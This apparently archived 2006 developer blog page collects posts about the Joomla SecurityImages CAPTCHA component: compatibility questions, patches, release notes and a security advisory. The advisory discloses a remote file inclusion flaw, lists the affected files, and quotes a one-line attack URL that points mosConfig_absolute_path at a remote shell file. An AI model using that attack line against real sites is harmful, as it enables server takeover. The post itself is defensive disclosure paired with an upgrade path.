Main Menu

Recommended sites

Add to MyYahoo!
Subscribe in NewsGator Online
Add to Newsburst
Add to Google
Add to My AOL
Add to Pluck
Subscribe in FeedLounge
Add to Windows Live
Add to NetVibes
Subscribe in Rojo
Subscribe in Bloglines
Add to MyMSN
Add to Plusmo for your cellphone
Add to PageFlakes
Add to Technorati
Add to BlinkBits

items tagged with securityimage3

Community Builder with security images?
Written By: Administrator
Section: Joomla
Category: SecurityImages
2006-07-01 10:21:20
Someone write me an email:
Do you have anywhere people can chat about com_securityimages? I want to use it but because I use Community Builder 1.0, there's nothing I can do to use it without direct support for CB. I'm hoping there's some place I can discuss this, maybe others have worked  around it somehow etc? Is there a chance you'll be able to make support for CB for this?
 
Community Builder is
  • A Joomla/Mambo component and 3 collaborating core modules
  • An environment for producing and maintaining online communities on Joomla/Mambo driven sites
  • A system that provides user profile capabilities for Joomla/Mambo sites
  • A different registration/login process for Joomla/Mambo sites (supports 4 different workflows)
  • An environment that enables Mambo/Joomla site administrators to create user profiles that capture extra information from users (with the creation of new fields) that can be presented and organized in tabs (again defined by the administrator)
  • A framework for other Joomla/Mambo components to integrate with user profiles

I can look at the code for You, download Community Builder and make a patch, but right now I have a serious bug in securityimages 3.0.5 and all previous version, that require me to work on it...
As soon as You have 2 capctha in the same page, securityimages won't work! and this because I am using the same hidden field behind for both images.

So ideally I will first patch securityimages, and that will break compatibility with all 3rd party component (guestbook, comments, blogxx, ...) , then patch Community Builder...

joomla 1.0.11 securityimages support
Written By: Administrator
Section: Joomla
Category: SecurityImages
2006-08-29 23:10:48
These files are from the 1.0.11 Joomla distributions plus all changes required to support securityimages in
  • com_contact
  • com_login
  • com_registration
Please Note:
1. this is a FTP patch!
2. There is now way to deactivate securityimages in com_contact (other than deactivating securityimages sitewide)

Patch is available in my download section and at Joomla Forge HERE

Do yourself a favor and always use the latest securityimages version 3.0.7 . All versions of securityimages with a release  <= 3.0.5  have a  highly critical  securty flaws (server takeover) so UPGRADE



Security risk in securityimages
Written By: Administrator
Section: Joomla
Category: SecurityImages
2006-08-01 19:58:39


The webmaster of janwiersma.com sent me an email today
at 6:12AM , his server was hacked because of a bug in
securityimages. This bug allows a remote atacker to
execute commands via remote forceful include and
execute function on your server
and affect ALL version of securityimages <= 3.0.5

Here are all files which put your server at risk:
client.php, configinsert.php, lang.php, server.php

Example of attack:
http://web/components/com_securityimages/
configinsert.php?mosConfig_absolute_path=http://shell.txt
from http://securityreason.com/exploitalert/892
Secunia has also a report on it: http://secunia.com/product/11186/
In fact I forget to use that line in these files:
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
This avoid any requests to access directly this file. 

- upgrade to 3.0.6 (download at Joomla Forge or in my download sections) OR
- patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)

Please also contact all Your friends which are using securityimages!

And for my other components?

Hashcash 1.2.X is also affected: http://secunia.com/product/11046/  and my patch is avalaible!

- upgrade to 1.2.2  (download at Joomla Forge or in my download sections) OR
- patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)

JoomlaCloud is NOT affected




YOU ARE ALL URGE TO UPGRADE ASAP!



SecurityImages 3.0.4
Written By: Administrator
Section: Joomla
Category: SecurityImages
2006-04-12 19:47:19
 Maintenance releases
  • BUG: captha combo box is now Joomla, Mambo CSS aware class="inputbox"
  • BUG: affecting array of font was not working and lead to a corrupt array in plugin core 1.1
  • BUG: HNCAPTCHA O, o I and i and 1 impossible to read...
    This is not due to the random Text Generator but more to one font rubberst.ttf, get rid of it in
    the "hncaptcha core admin panel". Remember the more fonts the more difficult to hack it with OCR robots.
  • NEW add czech translation


SecurityImages 3.0.5 release
Written By: Administrator
Section: Joomla
Category: SecurityImages
2006-05-28 13:09:23


One way to crack CAPTCHA  is to offer a free porn site which requires that the user  key in the solution to a captcha -- which has been inlined from my site for example -- before he can gain access. Free porn images or video attract a lot of users around the clock and in many countries.
SecurityImages 3.0.5 try to solve this issue by adding a text in the generated picture.

  • NEW: Hncaptcha 1.0 has been modified
  • NEW: Core 1.1 has been modified
Download it at Joomlaforge or in my download section






There are 6 items tagged with securityimage3. You can view all our tags in the Tag Cloud

<< Start < Previous 1 2 Next > End >>
Page 1 Of 2
Content View Hits : 3166676

Enter Amount: